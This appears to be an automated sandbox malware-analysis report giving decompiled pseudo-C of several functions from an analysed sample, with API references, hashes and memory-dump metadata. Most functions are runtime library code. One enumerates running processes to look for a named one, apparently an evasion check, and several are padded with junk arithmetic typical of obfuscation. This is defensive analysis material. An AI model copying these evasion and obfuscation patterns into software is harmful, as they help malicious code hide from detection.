0x00f6e270
0x00f6e275
0x00f6e276
0x00f6e27b
0x00f6e27c
0x00f6e28b
0x00f6e293
0x00f6e2a5
0x00f6e2b8
0x00f6e2c3
0x00f6e2dd
0x00f6e2e0
0x00f6e2ec
0x00f6e2ee
0x00f6e2f6
0x00f6e300
0x00f6e30b
0x00f6e311
0x00f6e317
0x00f6e319
0x00f6e31e
0x00f6e326
0x00f6e32c
0x00f6e32e
0x00f6e330
0x00f6e333
0x00f6e33b
0x00f6e33f
0x00f6e341
0x00f6e343
0x00f6e34f
0x00f6e358
0x00f6e361
0x00f6e364
0x00f6e367
0x00f6e36d
0x00f6e370
0x00f6e373
0x00f6e379
0x00f6e37f
0x00f6e37f
0x00f6e333
0x00f6e38a
0x00f6e393
0x00f6e39b
0x00f6e3a6
0x00f6e3b7
0x00f6e3c6
0x00f6e3cf
0x00f6e3da
0x00f6e3ee
0x00f6e3f4
0x00f6e3f9
0x00f6e40c
0x00f6e415
0x00f6e41c
0x00f6e41f
0x00f6e422
0x00f6e425
0x00f6e427
0x00f6e42a
0x00f6e42c
0x00f6e42e
0x00f6e431
0x00f6e433
0x00f6e439
0x00f6e43f
0x00f6e442
0x00f6e445
0x00f6e448
0x00f6e454
0x00f6e45a
0x00f6e45d
0x00f6e45d
0x00f6e466
0x00f6e46b
0x00f6e484
0x00f6e48f
0x00f6e4a9
0x00f6e4b1
0x00f6e4bc
0x00f6e4ce
0x00f6e4d7
0x00f6e4dc
0x00f6e4ea
0x00f6e508
0x00f6e50a
0x00f6e515
0x00f6e525
0x00f6e52d
0x00f6e538
0x00f6e540
0x00f6e548
0x00f6e556

APIs

Part of subcall function 00F6CF90: _malloc.LIBCMT ref: 00F6CFC7

__snprintf.LIBCMT ref: 00F6E28B

Part of subcall function 00F76570: _memset.LIBCMT ref: 00F76593
Part of subcall function 00F76570: _free.LIBCMT ref: 00F76599

_memset.LIBCMT ref: 00F6E2B8

Strings

7i\, xrefs: 00F6E343
C:\Users\user, xrefs: 00F6E2CF

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: _memset$__snprintf_free_malloc
String ID: 7i\$C:\Users\user
API String ID: 801102166-4181716859
Opcode ID: 75370f6ef4fe0049088b0e8e827344d2c9a3295bafd986c6f795a0bc4d8d3546
Instruction ID: b8b063b50af2996c7e71dfa348e82f3f21411b39568bf521ac3039bed874282d
Opcode Fuzzy Hash: 75370f6ef4fe0049088b0e8e827344d2c9a3295bafd986c6f795a0bc4d8d3546
Instruction Fuzzy Hash: 5291C2B1D0020CEBDB04EFA0EC95BED7B38FF55300F508455E585A21A5EFB41668EBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00F91E9E Relevance: 6.2, APIs: 4, Instructions: 173
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 99%

			E00F91E9E(void* __edx, signed char* _a4, signed int _a8, intOrPtr _a12) {
				signed int _v7;
				signed int _v8;
				char _v12;
				intOrPtr _v16;
				signed int _v20;
				char _v24;
				signed int _t72;
				signed int _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				signed short _t82;
				void* _t84;
				signed short _t87;
				intOrPtr _t91;
				signed int _t97;
				signed int _t100;
				void* _t101;
				signed int _t102;
				void* _t103;
				signed int _t104;
				signed char* _t115;
				signed char* _t116;
				signed int _t117;
				signed int _t118;
				signed int _t119;
				signed int _t125;
				signed int _t126;
				void* _t128;

				E00F7EE17( &_v24, __edx, _a12);
				_t115 = _a4;
				_t130 = _t115;
				if(_t115 != 0) {
					_t97 = _a8;
					__eflags = _t97;
					if(__eflags != 0) {
						_t72 = _v20;
						__eflags =  *(_t72 + 8);
						if( *(_t72 + 8) != 0) {
							while(1) {
								_t100 =  *_t115 & 0x000000ff;
								_t125 = _t100 & 0x000000ff;
								_t116 =  &(_t115[1]);
								__eflags =  *(_t125 + _t72 + 0x1d) & 0x00000004;
								_a4 = _t116;
								if(( *(_t125 + _t72 + 0x1d) & 0x00000004) == 0) {
									goto L20;
								}
								__eflags =  *_t116;
								if(__eflags != 0) {
									_t84 = E00F94562(__eflags,  &_v24,  *((intOrPtr*)(_t72 + 0xc)), 0x200, _t116 - 1, 2,  &_v8, 2,  *((intOrPtr*)(_t72 + 4)), 1);
									_t128 = _t128 + 0x24;
									__eflags = _t84 - 1;
									if(_t84 != 1) {
										__eflags = _t84 - 2;
										if(__eflags != 0) {
											goto L37;
										} else {
											_t87 = (_v8 & 0x000000ff) * 0x100 + (_v7 & 0x000000ff);
											__eflags = _t87;
											_t126 = _t87 & 0x0000ffff;
											goto L19;
										}
									} else {
										_t126 = _v8 & 0x000000ff;
										L19:
										_a4 =  &(_a4[1]);
										_t72 = _v20;
										goto L23;
									}
								} else {
									_t126 = 0;
									L23:
									_t102 =  *_t97 & 0x000000ff;
									_t118 = _t102 & 0x000000ff;
									_t97 = _t97 + 1;
									__eflags =  *(_t118 + _t72 + 0x1d) & 0x00000004;
									if(( *(_t118 + _t72 + 0x1d) & 0x00000004) == 0) {
										_t119 = _t102;
										_t103 = _t119 + _t72;
										__eflags =  *(_t103 + 0x1d) & 0x00000010;
										if(( *(_t103 + 0x1d) & 0x00000010) == 0) {
											_t104 = _t119;
										} else {
											_t104 =  *(_t103 + 0x11d) & 0x000000ff;
										}
										goto L34;
									} else {
										__eflags =  *_t97;
										if(__eflags != 0) {
											_t46 = _t97 - 1; // 0xf7d1bb
											_t77 = E00F94562(__eflags,  &_v24,  *((intOrPtr*)(_t72 + 0xc)), 0x200, _t46, 2,  &_v8, 2,  *((intOrPtr*)(_t72 + 4)), 1);
											_t128 = _t128 + 0x24;
											__eflags = _t77 - 1;
											if(_t77 != 1) {
												__eflags = _t77 - 2;
												if(__eflags != 0) {
													L37:
													 *((intOrPtr*)(E00F7FA66(__eflags))) = 0x16;
													__eflags = _v12;
													if(_v12 != 0) {
														_t79 = _v16;
														_t61 = _t79 + 0x70;
														 *_t61 =  *(_t79 + 0x70) & 0xfffffffd;
														__eflags =  *_t61;
													}
													_t74 = 0x7fffffff;
												} else {
													_t82 = (_v8 & 0x000000ff) * 0x100 + (_v7 & 0x000000ff);
													__eflags = _t82;
													_t104 = _t82 & 0x0000ffff;
													goto L30;
												}
											} else {
												_t104 = _v8 & 0x000000ff;
												L30:
												_t72 = _v20;
												_t97 = _t97 + 1;
												goto L34;
											}
										} else {
											_t104 = 0;
											L34:
											__eflags = _t104 - _t126;
											if(_t104 != _t126) {
												asm("sbb eax, eax");
												_t74 = (_t72 & 0x00000002) - 1;
												__eflags = _v12;
												if(_v12 != 0) {
													 *(_v16 + 0x70) =  *(_v16 + 0x70) & 0xfffffffd;
												}
											} else {
												__eflags = _t126;
												if(_t126 == 0) {
													__eflags = _v12;
													if(_v12 != 0) {
														_t75 = _v16;
														_t69 = _t75 + 0x70;
														 *_t69 =  *(_t75 + 0x70) & 0xfffffffd;
														__eflags =  *_t69;
													}
													_t74 = 0;
													__eflags = 0;
												} else {
													_t115 = _a4;
													continue;
												}
											}
										}
									}
								}
								goto L46;
								L20:
								_t117 = _t100;
								_t101 = _t117 + _t72;
								__eflags =  *(_t101 + 0x1d) & 0x00000010;
								if(( *(_t101 + 0x1d) & 0x00000010) == 0) {
									_t126 = _t117;
								} else {
									_t126 =  *(_t101 + 0x11d) & 0x000000ff;
								}
								goto L23;
							}
						} else {
							_t74 = E00F9C2F6(_t115, _t115, _t97,  &_v24);
							__eflags = _v12;
							if(_v12 != 0) {
								 *(_v16 + 0x70) =  *(_v16 + 0x70) & 0xfffffffd;
							}
						}
					} else {
						 *((intOrPtr*)(E00F7FA66(__eflags))) = 0x16;
						E00F7C1AB();
						__eflags = _v12 - _t97;
						if(_v12 != _t97) {
							_t91 = _v16;
							_t11 = _t91 + 0x70;
							 *_t11 =  *(_t91 + 0x70) & 0xfffffffd;
							__eflags =  *_t11;
						}
						_t74 = 0x7fffffff;
					}
					L46:
					return _t74;
				} else {
					 *((intOrPtr*)(E00F7FA66(_t130))) = 0x16;
					E00F7C1AB();
					if(_v12 != 0) {
						 *(_v16 + 0x70) =  *(_v16 + 0x70) & 0xfffffffd;
					}
					return 0x7fffffff;
				}
			}

0x00f91eac
0x00f91eb1
0x00f91eb4
0x00f91eb6
0x00f91edd
0x00f91ee0
0x00f91ee2
0x00f91f0a
0x00f91f0d
0x00f91f11
0x00f91f3e
0x00f91f3e
0x00f91f41
0x00f91f44
0x00f91f45
0x00f91f4a
0x00f91f4d
0x00000000
0x00000000
0x00f91f4f
0x00f91f52
0x00f91f6f
0x00f91f74
0x00f91f77
0x00f91f7a
0x00f91f82
0x00f91f85
0x00000000
0x00f91f8b
0x00f91f9c
0x00f91f9c
0x00f91f9f
0x00000000
0x00f91f9f
0x00f91f7c
0x00f91f7c
0x00f91fa2
0x00f91fa2
0x00f91fa5
0x00000000
0x00f91fa5
0x00f91f54
0x00f91f54
0x00f91fc0
0x00f91fc0
0x00f91fc3
0x00f91fc6
0x00f91fc7
0x00f91fcc
0x00f92025
0x00f92027
0x00f9202a
0x00f9202e
0x00f92039
0x00f92030
0x00f92030
0x00f92030
0x00000000
0x00f91fce
0x00f91fce
0x00f91fd1
0x00f91fe4
0x00f91ff0
0x00f91ff5
0x00f91ff8
0x00f91ffb
0x00f92003
0x00f92006
0x00f9204d
0x00f92052
0x00f92058
0x00f9205c
0x00f9205e
0x00f92061
0x00f92061
0x00f92061
0x00f92061
0x00f92065
0x00f92008
0x00f92019
0x00f92019
0x00f9201c
0x00000000
0x00f9201c
0x00f91ffd
0x00f91ffd
0x00f9201f
0x00f9201f
0x00f92022
0x00000000
0x00f92022
0x00f91fd3
0x00f91fd3
0x00f9203b
0x00f9203b
0x00f9203e
0x00f9206c
0x00f92071
0x00f92072
0x00f92076
0x00f9207b
0x00f9207b
0x00f92040
0x00f92040
0x00f92043
0x00f92081
0x00f92085
0x00f92087
0x00f9208a
0x00f9208a
0x00f9208a
0x00f9208a
0x00f9208e
0x00f9208e
0x00f92045
0x00f92045
0x00000000
0x00f92045
0x00f92043
0x00f9203e
0x00f91fd1
0x00f91fcc
0x00000000
0x00f91faa
0x00f91faa
0x00f91fac
0x00f91faf
0x00f91fb3
0x00f91fbe
0x00f91fb5
0x00f91fb5
0x00f91fb5
0x00000000
0x00f91fb3
0x00f91f13
0x00f91f19
0x00f91f21
0x00f91f25
0x00f91f2e
0x00f91f2e
0x00f91f25
0x00f91ee4
0x00f91ee9
0x00f91eef
0x00f91ef4
0x00f91ef7
0x00f91ef9
0x00f91efc
0x00f91efc
0x00f91efc
0x00f91efc
0x00f91f00
0x00f91f00
0x00f92092
0x00f92094
0x00f91eb8
0x00f91ebd
0x00f91ec3
0x00f91ecc
0x00f91ed1
0x00f91ed1
0x00f91edb
0x00f91edb

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00F91EAC

Part of subcall function 00F7EE17: __getptd.LIBCMT ref: 00F7EE2A

Part of subcall function 00F7FA66: __getptd_noexit.LIBCMT ref: 00F7FA66

__stricmp_l.LIBCMT ref: 00F91F19

Part of subcall function 00F9C2F6: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00F9C305

___crtLCMapStringA.LIBCMT ref: 00F91F6F
___crtLCMapStringA.LIBCMT ref: 00F91FF0

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: Locale$StringUpdateUpdate::____crt$__getptd__getptd_noexit__stricmp_l
String ID:
API String ID: 2544346105-0
Opcode ID: 41000adf74629f179fe195b9832f3fda6c7d14183ab1da88fb0556a3e3bda965
Instruction ID: 2da8ec7f9eaf20b020245a8978d352d28022bcd2c228868f46d59c3d6ac9910c
Opcode Fuzzy Hash: 41000adf74629f179fe195b9832f3fda6c7d14183ab1da88fb0556a3e3bda965
Instruction Fuzzy Hash: 75513A71D04199ABFF259B64C885BBE7BB0BF11328F288199E4A15B1E2D3358E41F750

Uniqueness

Uniqueness Score: -1.00%

Function 00F72E30 Relevance: 6.1, APIs: 4, Instructions: 132
processCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00F72E30(intOrPtr* _a4) {
				signed char _v8;
				long long _v12;
				int _v16;
				long long _v24;
				signed long long _v32;
				void* _v328;
				char _v588;
				signed char _t34;
				signed char _t35;
				intOrPtr _t39;
				intOrPtr* _t42;
				intOrPtr* _t45;
				intOrPtr _t47;
				intOrPtr* _t50;
				intOrPtr _t52;
				intOrPtr _t54;
				char _t58;
				intOrPtr* _t59;
				short _t62;
				intOrPtr _t64;
				intOrPtr _t65;
				void* _t69;
				void* _t71;
				void* _t72;
				long long _t86;
				long long _t88;
				signed long long _t95;

				_v16 = 0;
				_t86 =  *0xfae584 -  *0xfa77d4;
				 *0xfae584 = _t86;
				_t34 =  *0xfae5c4; // 0x80000000
				_v8 = _t34;
				asm("fild dword [ebp-0x4]");
				_v12 = _t86;
				_t52 =  *0xfae408; // 0x0
				_t88 =  *0xfae15c + _v12;
				_v8 = _t52;
				_v24 = _t88;
				asm("fild dword [ebp-0x4]");
				_v32 = _t88 + _v24;
				_t35 =  *0xfae458; // 0x5bdf
				_v24 =  *0xfae5fc;
				_v8 = _t35;
				asm("fild dword [ebp-0x4]");
				asm("fucompp");
				asm("fnstsw ax");
				asm("fld1");
				_t95 = st0;
				asm("faddp st2, st0");
				asm("fxch st0, st1");
				 *0xfae5fc = _t95;
				asm("fsubr dword [0xfae15c]");
				 *0xfae15c = _t95;
				if((_t35 & 0x00000044) == 0) {
					_t47 =  *0xfae38c; // 0x93fc1fed
					 *0xfae0f8 = ( *0xfae0f8 & 0x0000ffff) * (_t47 + 0xcd8c8686);
				}
				_t69 = CreateToolhelp32Snapshot(2, 0);
				if(_t69 != 0) {
					_t95 =  *0xfae148;
					_t39 =  *0xfae158; // 0x80000000
					_v8 = 0xb3962bdd - _t39;
					asm("fild dword [ebp-0x4]");
					asm("fsubp st1, st0");
					 *0xfae148 = _t95;
					 *0xfae158 =  *0xfae158 + 1;
					_v328 = 0x128;
					if(Process32First(_t69,  &_v328) != 0) {
						_t50 = _a4;
						do {
							_t42 = 0;
							do {
								_t58 =  *((intOrPtr*)(_t71 + _t42 - 0x120));
								 *((char*)(_t71 + _t42 - 0x248)) = _t58;
								_t42 = _t42 + 1;
							} while (_t58 != 0);
							E00FA2BB6( &_v588);
							_t72 = _t72 + 4;
							_t59 = _t50;
							_t45 =  &_v588;
							while(1) {
								_t64 =  *_t45;
								if(_t64 !=  *_t59) {
									break;
								}
								if(_t64 == 0) {
									L12:
									_t45 = 0;
								} else {
									_t65 =  *((intOrPtr*)(_t45 + 1));
									_t26 = _t59 + 1; // 0xc08504c4
									if(_t65 !=  *_t26) {
										break;
									} else {
										_t45 = _t45 + 2;
										_t59 = _t59 + 2;
										if(_t65 != 0) {
											continue;
										} else {
											goto L12;
										}
									}
								}
								L14:
								if(_t45 == 0) {
									_v16 = 1;
								} else {
									goto L15;
								}
								L18:
								goto L19;
							}
							asm("sbb eax, eax");
							asm("sbb eax, 0xffffffff");
							goto L14;
							L15:
							_v328 = 0x128;
						} while (Process32Next(_t69,  &_v328) != 0);
						goto L18;
					}
					L19:
					CloseHandle(_t69);
				}
				_t62 =  *0xfae44c; // 0x2575
				_t54 =  *0xfae5f8; // 0x8b5936b7
				_v8 = _t54 - _t62;
				asm("fild dword [ebp-0x4]");
				_v32 = _t95;
				 *0xfae248 =  *0xfae248 * _v32;
				 *0xfae44c =  *0xfae44c + 1;
				return _v16;
			}

0x00f72e3f
0x00f72e46
0x00f72e4c
0x00f72e52
0x00f72e57
0x00f72e5a
0x00f72e5d
0x00f72e66
0x00f72e6d
0x00f72e73
0x00f72e76
0x00f72e79
0x00f72e7f
0x00f72e88
0x00f72e8e
0x00f72e94
0x00f72e97
0x00f72ea6
0x00f72ea8
0x00f72eb0
0x00f72eb2
0x00f72eb4
0x00f72eb6
0x00f72eb8
0x00f72ebe
0x00f72ec4
0x00f72ecd
0x00f72ecf
0x00f72ee3
0x00f72ee3
0x00f72ef5
0x00f72ef9
0x00f72eff
0x00f72f05
0x00f72f11
0x00f72f14
0x00f72f1f
0x00f72f21
0x00f72f27
0x00f72f2d
0x00f72f3f
0x00f72f46
0x00f72f50
0x00f72f50
0x00f72f60
0x00f72f60
0x00f72f67
0x00f72f6e
0x00f72f6f
0x00f72f7a
0x00f72f7f
0x00f72f82
0x00f72f84
0x00f72f90
0x00f72f90
0x00f72f94
0x00000000
0x00000000
0x00f72f98
0x00f72fac
0x00f72fac
0x00f72f9a
0x00f72f9a
0x00f72f9d
0x00f72fa0
0x00000000
0x00f72fa2
0x00f72fa2
0x00f72fa5
0x00f72faa
0x00000000
0x00000000
0x00000000
0x00000000
0x00f72faa
0x00f72fa0
0x00f72fb5
0x00f72fb7
0x00f72fdb
0x00000000
0x00000000
0x00000000
0x00f72fe2
0x00000000
0x00f72fe2
0x00f72fb0
0x00f72fb2
0x00000000
0x00f72fb9
0x00f72fc1
0x00f72fd1
0x00000000
0x00f72fd9
0x00f72fe3
0x00f72fe4
0x00f72fe4
0x00f72fea
0x00f72ff1
0x00f72fff
0x00f73003
0x00f73006
0x00f73012
0x00f73018
0x00f73022

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00F72EEF
Process32First.KERNEL32(00000000,?), ref: 00F72F37
Process32Next.KERNEL32(00000000,00000128), ref: 00F72FCB
CloseHandle.KERNEL32(00000000), ref: 00F72FE4

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 7be42fb47b42a4b769d13226cd63ba12a17a0e30e54746116b2ab0e35d7a5820
Instruction ID: ea95d2d1aea8531516b0692f4913bdce365979f22a5dfcc32639699d991db257
Opcode Fuzzy Hash: 7be42fb47b42a4b769d13226cd63ba12a17a0e30e54746116b2ab0e35d7a5820
Instruction Fuzzy Hash: 3851A4B1E0411DDFDB00DF60ED987EDBBB4FB4A310F148195D889A2264EB314A68EF21

Uniqueness

Uniqueness Score: -1.00%

Function 00F94678 Relevance: 6.1, APIs: 4, Instructions: 103
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00F94678(void* __edx, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				char _t59;
				short* _t60;
				int _t65;
				char* _t73;

				_t73 = _a8;
				if(_t73 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t73 != 0) {
						E00F7EE17( &_v20, __edx, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E00F947A8( *_t73 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E00F7FA66(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								__eflags = _a12 -  *(_t56 + 0xac);
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t73[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t57 =  *(_t56 + 0xac);
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t73 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x00f94682
0x00f94689
0x00f946a0
0x00000000
0x00f94690
0x00f94692
0x00f946ac
0x00f946b1
0x00f946b4
0x00f946b7
0x00f946df
0x00f946e6
0x00f946e8
0x00f94769
0x00f94784
0x00f94786
0x00f946c6
0x00f946c6
0x00f946c9
0x00f946cb
0x00f946ce
0x00f946ce
0x00f946ce
0x00f946ce
0x00000000
0x00f946d4
0x00f94748
0x00f94748
0x00f9474d
0x00f94753
0x00f94756
0x00f94758
0x00f9475b
0x00f9475b
0x00f9475b
0x00f9475b
0x00000000
0x00f9475f
0x00f946ea
0x00f946ed
0x00f946f3
0x00f946f6
0x00f9471d
0x00f94720
0x00f94726
0x00000000
0x00000000
0x00f94728
0x00f9472b
0x00000000
0x00000000
0x00f9472d
0x00f9472d
0x00f94733
0x00f94736
0x00f946a5
0x00f946a5
0x00f9473f
0x00000000
0x00f9473f
0x00f946f8
0x00f946fb
0x00000000
0x00000000
0x00f946ff
0x00f94710
0x00f94716
0x00f94718
0x00f9471b
0x00000000
0x00000000
0x00000000
0x00f9471b
0x00f946b9
0x00f946bc
0x00f946be
0x00f946c3
0x00f946c3
0x00000000
0x00f94694
0x00f94694
0x00f94699
0x00f9469d
0x00f9469d
0x00000000
0x00f94699
0x00f94692

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00F946AC
__isleadbyte_l.LIBCMT ref: 00F946DF
MultiByteToWideChar.KERNEL32(?,00000009,00F6576F,?,00000F11,00000000,?,?,?,00000104,00F6576F,00000F11), ref: 00F94710
MultiByteToWideChar.KERNEL32(?,00000009,00F6576F,00000001,00000F11,00000000,?,?,?,00000104,00F6576F,00000F11), ref: 00F9477E

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 898b05cd90ccc1ba5ecce3a63b953ee7c14d2327e7eeaf2c301ee44e09ce389f
Instruction ID: 72883342ca79525ca664bea89deed21f391d41bab74d9ba54dfd97f807ed316a
Opcode Fuzzy Hash: 898b05cd90ccc1ba5ecce3a63b953ee7c14d2327e7eeaf2c301ee44e09ce389f
Instruction Fuzzy Hash: 4231E571900249EFEF20DFA4CC80EBD7BA5BF12321F158569E1658B191D330ED42EB21

Uniqueness

Uniqueness Score: -1.00%

Function 00F6BA80 Relevance: 6.1, APIs: 4, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00F6BA80(intOrPtr* _a4, intOrPtr* _a8, intOrPtr _a12) {
				long long _v12;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				short _t20;
				intOrPtr _t38;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				short _t49;
				intOrPtr _t52;
				intOrPtr* _t54;
				intOrPtr* _t56;
				long long _t72;

				 *0xfae34c =  *0xfae34c + 0xc8af7e23;
				_t52 = _a12;
				if(_t52 == 0xffffffff) {
					_t54 = _a8;
					_t3 = _t54 + 1; // 0x1
					_t46 = _t3;
					do {
						_t19 =  *_t54;
						_t54 = _t54 + 1;
					} while (_t19 != 0);
					_t52 = _t54 - _t46;
				}
				if(_t52 > 0) {
					_t20 =  *0xfae0bc; // 0xdec
					_t47 =  *0xfae45c; // 0x386cf1b3
					 *0xfae0c4 =  *0xfae0c4 + 0x1159f68f - _t20 + _t47;
					 *0xfae0bc =  *0xfae0bc + 1;
					_t56 = _a4;
					if( *_t56 != 0) {
						_t38 = E00F7CBC4(_t47, _t52, _t56,  *((intOrPtr*)(_t56 + 4)) + _t52);
						E00F7C200(_t38,  *_t56,  *((intOrPtr*)(_t56 + 4)));
						E00F7C990( *_t56, 0,  *((intOrPtr*)(_t56 + 4)));
						_t49 =  *0xfae508; // 0x0
						_a12 = _t49;
						_v12 =  *0xfae60c -  *0xfa75e8;
						asm("fild dword [ebp+0x10]");
						 *0xfae508 = E00F7CABC();
						asm("fld1");
						asm("fsubp st1, st0");
						E00F7CB4B( *_t56);
						 *_t56 = _t38;
						_t19 = E00F7C200( *((intOrPtr*)(_t56 + 4)) + _t38, _a8, _t52);
						 *((intOrPtr*)(_t56 + 4)) =  *((intOrPtr*)(_t56 + 4)) + _t52;
					} else {
						 *_t56 = E00F7CBC4(_t47, _t52, _t56, _t52);
						 *((intOrPtr*)(_t56 + 4)) = _t52;
						_t19 = E00F7C200(_t36, _a8, _t52);
					}
					_t72 =  *0xfae1e4;
					_t43 =  *0xfae530; // 0xe1aaad3d
					_v12 = _t72;
					_a12 = _t43 - 0x28cd55a7;
					asm("fild dword [ebp+0x10]");
					asm("fsubr qword [ebp-0x8]");
					 *0xfae1e4 = _t72;
				}
				return _t19;
			}

0x00f6ba83
0x00f6ba91
0x00f6ba97
0x00f6ba99
0x00f6ba9c
0x00f6ba9c
0x00f6baa0
0x00f6baa0
0x00f6baa2
0x00f6baa3
0x00f6baa7
0x00f6baa7
0x00f6baab
0x00f6bab1
0x00f6bab7
0x00f6bac9
0x00f6bacf
0x00f6bad7
0x00f6badd
0x00f6bb0b
0x00f6bb13
0x00f6bb21
0x00f6bb2c
0x00f6bb3c
0x00f6bb3f
0x00f6bb42
0x00f6bb4d
0x00f6bb59
0x00f6bb5b
0x00f6bb66
0x00f6bb76
0x00f6bb78
0x00f6bb80
0x00f6badf
0x00f6baeb
0x00f6baed
0x00f6baf0
0x00f6baf5
0x00f6bb84
0x00f6bb8a
0x00f6bb96
0x00f6bb99
0x00f6bb9c
0x00f6bba0
0x00f6bba3
0x00f6bba3
0x00f6bbad

APIs

_malloc.LIBCMT ref: 00F6BAE0
_malloc.LIBCMT ref: 00F6BB04
_memset.LIBCMT ref: 00F6BB21
_free.LIBCMT ref: 00F6BB66

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: _malloc$_free_memset
String ID:
API String ID: 1978200242-0
Opcode ID: 45d62d2701cc5a3fac4f861f0dca878e0e096dc51b54ec9c20b09697a4fadc86
